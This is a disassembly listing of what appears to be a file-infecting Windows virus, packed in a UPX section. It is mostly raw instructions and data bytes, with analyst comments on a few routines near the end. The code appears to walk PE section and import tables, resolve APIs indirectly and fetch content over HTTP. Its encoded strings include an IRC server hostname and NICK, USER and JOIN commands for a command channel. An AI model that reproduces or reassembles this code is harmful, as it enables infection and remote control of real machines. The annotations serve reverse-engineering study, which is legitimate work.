XREF: sub_3143159F+110j db 65h jb short near ptr loc_3143176C+2 imul ebp, [edi+6Eh], 417845h inc edi db 65h jz short near ptr loc_3143175B+1 outsd insb jnz short near ptr loc_31431771+6 loc_3143170A: ; CODE XREF: sub_3143159F:loc_314316BBj db 65h dec ecx outsb outsw jb short near ptr loc_3143177C+2 popa jz short near ptr loc_3143177C+1 outsd outsb inc ecx loc_31431717: ; CODE XREF: sub_3143159F:loc_314316D1j add [edi+ebp*2+61h], cl db 64h dec esp loc_3143171D: ; CODE XREF: sub_3143159F+12Ej imul esp, [edx+72h], 41797261h add [ebp+61h], cl jo short loc_3143177F loc_31431729: ; CODE XREF: sub_3143159F+120j imul esp, [ebp+77h], 6946664Fh insb loc_31431731: ; CODE XREF: sub_3143159F+13Fj ; sub_3143159F:loc_314316E2j add gs:[edi+70h], cl outs dx, byte ptr gs:[esi] inc esi imul ebp, [ebp+4Dh], 69707061h outsb db 67h inc ecx loc_31431743: ; CODE XREF: sub_3143159F:loc_314316EBj add [edi+70h], cl outs dx, byte ptr gs:[esi] push eax jb short near ptr loc_314317B9+1 arpl [ebp+73h], sp loc_3143174E: ; CODE XREF: sub_3143159F+146j jnb short $+2 push eax jb short loc_314317C2 arpl [ebp+73h], sp jnb short near ptr loc_31431784+7 xor al, [esi+69h] loc_3143175B: ; CODE XREF: sub_3143159F+164j jb short near ptr loc_314317CA+6 jz short $+2 push eax jb short near ptr loc_314317CA+7 loc_31431762: ; CODE XREF: sub_3143159F+14Ej arpl [ebp+73h], sp jnb short near ptr loc_31431799+1 xor cl, [esi+65h] js short near ptr loc_314317DC+4 loc_3143176C: ; CODE XREF: sub_3143159F:loc_314316F8j add [ebx+65h], dl jz short near ptr loc_314317B5+2 loc_31431771: ; CODE XREF: sub_3143159F+169j imul ebp, [ebp+41h], 69727474h bound esi, [ebp+74h] loc_3143177C: ; CODE XREF: sub_3143159F+173j ; sub_3143159F+170j db 65h jnb short loc_314317C0 loc_3143177F: ; CODE XREF: sub_3143159F+188j add [ebx+65h], dl jz short loc_314317CA loc_31431784: ; CODE XREF: sub_3143159F+1B7j imul ebp, [ebp+54h], 656D69h push ebx insb db 65h, 65h jo short $+4 push ebx jns short loc_31431808 jz short loc_314317FC insd push esp 
loc_31431799: ; CODE XREF: sub_3143159F+1C6j imul ebp, [ebp+65h], 69466F54h insb db 65h push esp imul ebp, [ebp+65h], 6D6E5500h popa jo short loc_31431803 imul esp, [ebp+77h], 6946664Fh insb loc_314317B5: ; CODE XREF: sub_3143159F+1D0j add gs:[esi+69h], dl loc_314317B9: ; CODE XREF: sub_3143159F+1AAj jb short near ptr loc_3143182E+1 jnz short loc_3143181E insb inc ecx insb loc_314317C0: ; CODE XREF: sub_3143159F:loc_3143177Cj insb outsd loc_314317C2: ; CODE XREF: sub_3143159F+1B2j arpl [eax], ax push edi jb short loc_31431830 jz short loc_3143182E inc esi loc_314317CA: ; CODE XREF: sub_3143159F+1E3j ; sub_3143159F:loc_3143175Bj ... imul ebp, [ebp+0], 6441744Eh push 75h jnb short loc_3143184A push eax jb short near ptr loc_3143183F+3 jbe short near ptr loc_3143183F+5 insb loc_314317DC: ; CODE XREF: sub_3143159F+1CBj db 65h, 67h, 65h jnb near ptr 1835h outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_3143182B+1 jb short near ptr loc_3143184F+1 popa jz short loc_31431853 inc esi imul ebp, [ebp+0], 7243744Eh db 65h popa jz short loc_31431860 push eax loc_314317FC: ; CODE XREF: sub_3143159F+1F6j jb short loc_3143186D arpl [ebp+73h], sp jnb short $+2 loc_31431803: ; CODE XREF: sub_3143159F+20Cj dec esi jz short near ptr loc_31431846+3 jb short loc_3143186D loc_31431808: ; CODE XREF: sub_3143159F+1F4j popa jz short loc_31431870 push eax jb short loc_3143187D arpl [ebp+73h], sp jnb short near ptr loc_31431853+5 js short $+2 dec esi jz short loc_3143185B jb short loc_3143187F popa jz short near ptr loc_3143187F+3 push ebx loc_3143181E: ; CODE XREF: sub_3143159F+21Cj arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl inc ebx jb short near ptr loc_3143188E+1 popa loc_3143182B: ; CODE XREF: sub_3143159F+248j jz short loc_31431892 push ebp loc_3143182E: ; CODE XREF: sub_3143159F+228j ; sub_3143159F:loc_314317B9j jnb short near ptr loc_31431894+1 loc_31431830: ; CODE XREF: sub_3143159F+226j jb short near ptr loc_3143187F+3 jb short loc_314318A3 arpl [ebp+73h], sp jnb 
short $+2 dec esi jz short loc_31431889 popa jo short near ptr loc_31431894+1 loc_3143183F: ; CODE XREF: sub_3143159F+238j ; sub_3143159F+23Aj imul esp, [ebp+77h], 6553664Fh loc_31431846: ; CODE XREF: sub_3143159F+265j arpl [ecx+ebp*2+6Fh], si loc_3143184A: ; CODE XREF: sub_3143159F+235j outsb add [esi+74h], cl dec edi loc_3143184F: ; CODE XREF: sub_3143159F+24Aj jo short loc_314318B6 outsb inc esi loc_31431853: ; CODE XREF: sub_3143159F+24Dj ; sub_3143159F+272j imul ebp, [ebp+0], 704F744Eh loc_3143185B: ; CODE XREF: sub_3143159F+277j outs dx, byte ptr gs:[esi] push eax jb short loc_314318CF loc_31431860: ; CODE XREF: sub_3143159F+25Aj arpl [ebp+73h], sp jnb short loc_314318B9 outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314318BB+1 loc_3143186D: ; CODE XREF: sub_3143159F:loc_314317FCj ; sub_3143159F+267j jo short near ptr loc_314318D3+1 outsb loc_31431870: ; CODE XREF: sub_3143159F+26Aj push ebx arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl push eax jb short near ptr loc_314318EB+1 loc_3143187D: ; CODE XREF: sub_3143159F+26Dj jz short near ptr loc_314318E3+1 loc_3143187F: ; CODE XREF: sub_3143159F+279j ; sub_3143159F+27Cj ... 
arpl [esi+edx*2+69h], si jb short loc_314318F9 jnz short near ptr loc_314318E7+1 insb dec ebp loc_31431889: ; CODE XREF: sub_3143159F+29Bj db 65h insd outsd jb short near ptr loc_31431904+3 loc_3143188E: ; CODE XREF: sub_3143159F+289j add [esi+74h], cl push ecx loc_31431892: ; CODE XREF: sub_3143159F:loc_3143182Bj jnz short loc_314318F9 loc_31431894: ; CODE XREF: sub_3143159F:loc_3143182Ej ; sub_3143159F+29Ej jb short near ptr loc_3143190E+1 dec ecx outsb outsw jb short near ptr loc_31431908+1 popa jz short loc_31431908 outsd outsb push esp outsd loc_314318A3: ; CODE XREF: sub_3143159F+293j imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314318FF+2 jb short loc_31431915 jz short near ptr loc_31431912+1 push esi imul esi, [edx+74h], 4D6C6175h loc_314318B6: ; CODE XREF: sub_3143159F:loc_3143184Fj db 65h insd outsd loc_314318B9: ; CODE XREF: sub_3143159F+2C4j jb short loc_31431934 loc_314318BB: ; CODE XREF: sub_3143159F+2CCj add [edx+74h], dl insb push ebp outsb imul esp, [ebx+6Fh], 74536564h jb short near ptr loc_31431931+2 outsb db 67h push esp outsd inc ecx loc_314318CF: ; CODE XREF: sub_3143159F+2BFj outsb jnb short near ptr loc_3143193A+1 push ebx loc_314318D3: ; CODE XREF: sub_3143159F:loc_3143186Dj jz short loc_31431947 imul ebp, [esi+67h], 41535700h push ebx jz short loc_31431940 jb short loc_31431955 jnz short near ptr loc_31431952+1 loc_314318E3: ; CODE XREF: sub_3143159F:loc_3143187Dj add [ebx+6Ch], ah outsd loc_314318E7: ; CODE XREF: sub_3143159F+2E6j jnb short loc_3143194E jnb short near ptr loc_31431959+1 loc_314318EB: ; CODE XREF: sub_3143159F+2DCj arpl [ebx+65h], bp jz short $+2 arpl [edi+6Eh], bp outsb arpl gs:[eax+eax+67h], si loc_314318F9: ; CODE XREF: sub_3143159F+2E4j ; sub_3143159F:loc_31431892j db 65h jz short near ptr loc_31431963+1 outsd jnb short near ptr loc_31431971+2 loc_314318FF: ; CODE XREF: sub_3143159F+309j bound edi, [ecx+6Eh] popa insd loc_31431904: ; CODE XREF: sub_3143159F+2EDj add gs:[edx+65h], dh loc_31431908: ; CODE XREF: 
sub_3143159F+2FEj ; sub_3143159F+2FBj arpl [esi+0], si jnb short near ptr loc_31431971+1 outsb loc_3143190E: ; CODE XREF: sub_3143159F:loc_31431894j add fs:[ebx+6Fh], dh loc_31431912: ; CODE XREF: sub_3143159F+30Dj arpl [ebx+65h], bp loc_31431915: ; CODE XREF: sub_3143159F+30Bj jz short $+2 dec ecx outsb jz short loc_31431980 jb short loc_3143198B db 65h jz short loc_31431963 insb outsd jnb short near ptr loc_31431988+1 dec eax popa outsb db 64h insb add gs:[ecx+6Eh], cl jz short loc_31431994 jb short near ptr loc_3143199E+1 loc_31431931: ; CODE XREF: sub_3143159F+329j db 65h jz short loc_3143197B loc_31431934: ; CODE XREF: sub_3143159F:loc_314318B9j db 65h jz short loc_3143197A outsd outsb outsb loc_3143193A: ; CODE XREF: sub_3143159F+331j arpl gs:[ebp+64h], si push ebx loc_31431940: ; CODE XREF: sub_3143159F+33Ej jz short near ptr loc_314319A2+1 jz short loc_314319A9 add [ecx+6Eh], cl loc_31431947: ; CODE XREF: sub_3143159F:loc_314318D3j jz short near ptr loc_314319AC+2 jb short loc_314319B9 db 65h jz short near ptr loc_3143199B+2 loc_3143194E: ; CODE XREF: sub_3143159F:loc_314318E7j jo short loc_314319B5 outsb inc ecx loc_31431952: ; CODE XREF: sub_3143159F+342j add [ecx+6Eh], cl loc_31431955: ; CODE XREF: sub_3143159F+340j jz short near ptr loc_314319BB+1 jb short loc_314319C7 loc_31431959: ; CODE XREF: sub_3143159F+34Aj db 65h jz short near ptr loc_314319AA+1 jo short loc_314319C3 outsb push ebp jb short near ptr loc_314319CC+2 inc ecx loc_31431963: ; CODE XREF: sub_3143159F+37Ej ; sub_3143159F:loc_314318F9j add [ecx+6Eh], cl jz short near ptr loc_314319CC+1 jb short loc_314319D8 db 65h jz short near ptr loc_314319BE+1 db 65h popa db 64h inc esi loc_31431971: ; CODE XREF: sub_3143159F+36Cj ; sub_3143159F+35Ej imul ebp, [ebp+0], 41564441h push eax loc_3143197A: ; CODE XREF: sub_3143159F:loc_31431934j dec ecx loc_3143197B: ; CODE XREF: sub_3143159F:loc_31431931j xor esi, [edx] db 2Eh inc esp dec esp loc_31431980: ; CODE XREF: sub_3143159F+37Aj dec esp add 
[edx+65h], dl db 67h inc ebx insb outsd loc_31431988: ; CODE XREF: sub_3143159F+383j jnb short near ptr loc_314319ED+2 dec ebx loc_3143198B: ; CODE XREF: sub_3143159F+37Cj db 65h jns short $+3 push edx db 65h, 67h dec edi jo short loc_314319F9 loc_31431994: ; CODE XREF: sub_3143159F+38Ej outsb dec ebx db 65h jns short near ptr loc_314319DC+2 js short loc_314319DC loc_3143199B: ; CODE XREF: sub_3143159F+3ACj add [edx+65h], dl loc_3143199E: ; CODE XREF: sub_3143159F+390j db 67h push ecx jnz short loc_31431A07 loc_314319A2: ; CODE XREF: sub_3143159F:loc_31431940j jb short near ptr loc_31431A1C+1 push esi popa insb jnz short near ptr loc_31431A0D+1 loc_314319A9: ; CODE XREF: sub_3143159F+3A3j inc ebp loc_314319AA: ; CODE XREF: sub_3143159F:loc_31431959j js short loc_314319ED loc_314319AC: ; CODE XREF: sub_3143159F:loc_31431947j add [edx+65h], dl db 67h push ebx db 65h jz short loc_31431A0A popa loc_314319B5: ; CODE XREF: sub_3143159F:loc_3143194Ej insb jnz short near ptr loc_31431A1C+1 inc ebp loc_314319B9: ; CODE XREF: sub_3143159F+3AAj js short loc_314319FC loc_314319BB: ; CODE XREF: sub_3143159F:loc_31431955j add [esi+33h], dl loc_314319BE: ; CODE XREF: sub_3143159F+3CBj imul byte ptr [edx+2] push esi push esi loc_314319C3: ; CODE XREF: sub_3143159F+3BDj mov edx, esp push 1 loc_314319C7: ; CODE XREF: sub_3143159F+3B8j push edx push dword ptr [edx+18h] push esi loc_314319CC: ; CODE XREF: sub_3143159F+3C7j ; sub_3143159F+3C1j call dword ptr [ebp+10427Ch] mov eax, esp push esi push esi push esi push eax loc_314319D8: ; CODE XREF: sub_3143159F+3C9j push esi push dword ptr [eax+18h] loc_314319DC: ; CODE XREF: sub_3143159F+3FAj ; sub_3143159F+3F7j call dword ptr [ebp+103EEAh] add esp, 10h pop esi retn 8 ; END OF FUNCTION CHUNK FOR sub_3143159F ; --------------------------------------------------------------------------- db 8Dh ; db 49h ; I db 0FBh ; db 2Bh ; + ; --------------------------------------------------------------------------- loc_314319ED: ; CODE XREF: 
sub_3143159F:loc_314319AAj ; sub_3143159F:loc_31431988j enter 6851h, 0 ; --------------------------------------------------------------------------- db 0 db 0 db 0E8h ; db 8Dh ; db 4Ch ; L db 24h ; $ db 3 db 6Ah ; j ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143159F loc_314319F9: ; CODE XREF: sub_3143159F+3F3j add [edx+5], ch loc_314319FC: ; CODE XREF: sub_3143159F:loc_314319B9j push ecx push eax push ebx push 5 mov ecx, esp push eax mov edx, esp push eax loc_31431A07: ; CODE XREF: sub_3143159F+401j push esp push 40h loc_31431A0A: ; CODE XREF: sub_3143159F+412j push ecx push edx push ebx loc_31431A0D: ; CODE XREF: sub_3143159F+408j call dword ptr [ebp+103F12h] add esp, 0Ch call dword ptr [ebp+103F1Ah] loc_31431A1C: ; CODE XREF: sub_3143159F:loc_314319A2j ; sub_3143159F+417j add esp, 8 retn ; END OF FUNCTION CHUNK FOR sub_3143159F ; --------------------------------------------------------------------------- db 8Dh ; db 95h ; db 20h db 3Eh ; > db 10h db 0 db 33h ; 3 db 0C9h ; db 6Ah ; j db 0 db 52h ; R db 68h ; h db 30h ; 0 db 0 db 32h ; 2 db 0 db 8Bh ; db 0C4h ; db 51h ; Q db 51h ; Q db 6Ah ; j db 40h ; @ db 50h ; P db 51h ; Q db 6Ah ; j db 18h db 83h ; db 0C0h ; db 8 db 54h ; T db 6Ah ; j db 0Eh db 50h ; P db 0FFh db 95h ; db 0Eh db 3Fh ; ? db 10h db 0 db 83h ; db 0C4h ; db 20h db 33h ; 3 db 0D2h ; db 85h ; db 0C0h ; db 0Fh db 99h ; db 0C2h ; db 0F7h ; db 0DAh ; db 58h ; X db 23h ; # db 0C2h ; db 0C3h ; db 57h ; W db 33h ; 3 db 0FFh db 0E8h ; db 0C1h ; db 0FFh db 0FFh db 0FFh db 0Fh db 84h ; db 0A5h ; db 0 db 0 db 0 db 50h ; P db 68h ; h db 18h db 73h ; s db 0 db 0 db 8Bh ; db 0D4h ; db 6Ah ; j db 0 db 8Bh ; db 0CCh ; db 6Ah ; j db 40h ; @ db 68h ; h db 0 db 0 db 10h db 0 db 6Ah ; j db 2 db 52h ; R db 6Ah ; j db 0 db 68h ; h db 18h db 73h ; s db 0 db 0 db 6Ah ; j db 0 db 51h ; Q db 53h ; S db 50h ; P db 0FFh db 95h ; db 2 db 3Fh ; ? 
db 10h db 0 db 5Fh ; _ db 59h ; Y db 0FFh db 95h ; db 52h ; R db 3Eh ; > db 10h db 0 db 85h ; db 0FFh db 74h ; t db 71h ; q db 8Bh ; db 8Dh ; db 80h ; db 15h db 10h db 0 db 0E3h ; db 0Ch db 8Dh ; db 95h ; db 0 db 10h db 10h db 0 db 3 db 0D1h ; db 57h ; W db 53h ; S db 0FFh db 0D2h ; db 8Bh ; db 85h ; db 0EEh ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 6 db 29h ; ) db 0 db 0 db 0E8h ; db 2Bh ; + db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 6 db 3Fh ; ? db 10h db 0 db 8Dh ; db 8Fh ; db 53h ; S db 29h ; ) db 0 db 0 db 0E8h ; db 1Ah db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F2h ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 5Ah ; Z db 29h ; ) db 0 db 0 db 0E8h ; db 9 db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F6h ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 20h db 8Dh ; db 8Fh ; db 67h ; g db 29h ; ) db 0 db 0 db 0E8h ; db 0F4h ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 85h ; db 0FEh ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 0Bh db 8Dh ; db 8Fh ; db 74h ; t db 29h ; ) db 0 db 0 db 0E8h ; db 0DFh ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 0C7h ; db 5Fh ; _ db 0C3h ; db 55h ; U db 0E8h ; db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101B14h xor ecx, ecx lea eax, [ebp+101E9Fh] push ecx push esp push ecx push ecx push eax push ecx push ecx call dword ptr [ebp+103E7Eh] xchg eax, [esp] call dword ptr [ebp+103E52h] pop ebp retn 4 ; --------------------------------------------------------------------------- db 55h, 0E8h, 0 dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h 
dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h dd 2007473h, 55500000h, 703C8972h, 69786F72h, 72692E6Dh dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62627075h dd 6F616D63h, 4553550Ah, 4A792052h, 204E494Fh, 72697626h dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h dd 103EAA95h, 1FE8C100h, 
1E6A3C74h, 3E62B58Bh, 0AC590010h dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h 
dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0 dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h dd 6299AD47h, 10A61429h, 0C26CCC5Ch, 606EF96Ah, 1Bh dup(0) ; =============== S U B R O U T I N E ======================================= sub_31432404 proc near ; CODE XREF: sub_314324BA:loc_314324A8p ; sub_3143250B+7p ... 
; sub_31432404 (body; its `proc` line is directly above)
;
; Purpose: find the 28h-byte record whose [start, start+size) range contains
;          arg_0 and publish the record address plus a rebasing delta.
; In:   ebx    base of a header structure. The offsets read here (+6 count
;              word, +14h size word, +18h start of a variable-size part, then
;              28h-byte records with fields at +8, +0Ch, +14h) match a PE
;              IMAGE_NT_HEADERS followed by IMAGE_SECTION_HEADERs -- presumably
;              ebx points at the PE header of a mapped file; confirm at callers.
;       arg_0  value to look up (an RVA under that reading).
;       ebp    base for the ebp-relative globals used throughout this listing.
; Out:  [ebp+1042E4h] = address of the matching record, 0 if nothing matched.
;       [ebp+1042E8h] = [rec+14h] - [rec+0Ch] for that record (raw-file offset
;                       minus virtual address under the PE reading), 0 if none.
;       General registers are preserved (pusha/popa); arg_0 is popped (retn 4).
arg_0 = dword ptr 4

        pusha
        and    dword ptr [ebp+1042E4h], 0      ; clear both results first
        and    dword ptr [ebp+1042E8h], 0
        movzx  eax, word ptr [ebx+14h]         ; size of the variable part at +18h
        lea    edx, [ebx+18h]
        movzx  ecx, word ptr [ebx+6]           ; ecx = number of records
        add    edx, eax                        ; edx = first record

loc_31432420:                                  ; CODE XREF: sub_31432404+41j
        mov    eax, [esp+20h+arg_0]
        sub    eax, [edx+0Ch]
        jb     short loc_31432442              ; arg_0 lies below this record
        cmp    eax, [edx+8]
        jnb    short loc_31432442              ; arg_0 lies at/after start+size
        mov    eax, [edx+14h]
        sub    eax, [edx+0Ch]
        mov    [ebp+1042E4h], edx
        mov    [ebp+1042E8h], eax
        jmp    short loc_31432447
; ---------------------------------------------------------------------------

loc_31432442:                                  ; CODE XREF: sub_31432404+23j
                                               ; sub_31432404+28j
        add    edx, 28h                        ; next record
        loop   loc_31432420

loc_31432447:                                  ; CODE XREF: sub_31432404+3Cj
        popa
        retn   4
sub_31432404 endp

; ---------------------------------------------------------------------------
; Unnamed code (no proc; the cross-references place it in UPX2).
; The call to sub_314324BA does not come back here as an ordinary call:
; sub_314324BA pops its own return address into [ebp+1042C4h], and
; sub_3143250B later executes `call dword ptr [ebp+1042C4h]`. The instructions
; from `push 1Fh` onward therefore run as a callback, once per imported name
; that sub_3143250B does not filter out, with ebx = the name hash it computed.
        mov    [ebp+102457h], al               ; byte store; read back as a dword below
        call   sub_314324BA
        push   1Fh
        lea    eax, [ebp+102384h]              ; table of dwords compared against ebx
        pop    ecx                             ; up to 1Fh entries are scanned

loc_31432462:                                  ; CODE XREF: UPX2:31432469j
        cmp    [eax], ebx
        jz     short loc_31432472
        add    eax, 4
        loop   loc_31432462
        inc    dword ptr [ebp+1042C0h]         ; no table entry matched: count it
        retn
; ---------------------------------------------------------------------------

loc_31432472:                                  ; CODE XREF: UPX2:31432464j
        neg    ecx
        add    ecx, [ebp+102457h]              ; NOTE(review): written as a byte above,
                                               ; read as a dword here -- check what the
                                               ; upper three bytes hold at run time
        jecxz  short loc_3143248C

loc_3143247C:                                  ; CODE XREF: UPX2:31432484j
        push   dword ptr [eax-4]               ; copy each earlier entry one slot up,
        pop    dword ptr [eax]                 ; walking toward the table start
        sub    eax, 4
        loop   loc_3143247C
        mov    [ebp+102384h], ebx              ; matched value becomes the first entry
; START OF FUNCTION CHUNK FOR sub_314324BA
;
; Reached from the jecxz above and from sub_314324BA+34. edx and esi are still
; the values sub_3143250B was using when it invoked the callback: edx = current
; 14h-byte descriptor, esi = cursor just past the dword read by lodsd.
; The pops below discard/restore what sub_3143250B had pushed, so control does
; not return into its loop. Presumably the result left in ecx is the virtual
; address of the selected thunk slot (file position -> RVA -> + [ebx+34h]);
; confirm against the code that consumes ecx.

loc_3143248C:                                  ; CODE XREF: UPX2:3143247Aj
                                               ; sub_314324BA+34j
        cmp    dword ptr [edx], 0
        jz     short loc_31432496
        sub    esi, [edx]                      ; cursor was in the array named by [edx];
        add    esi, [edx+10h]                  ; move it to the array named by [edx+10h]

loc_31432496:                                  ; CODE XREF: sub_314324BA-2Bj
        lea    ecx, [esi-4]                    ; slot that lodsd just read
        pop    eax                             ; return address into sub_3143250B (dropped)
        pop    ebx                             ; ebx saved by sub_3143250B
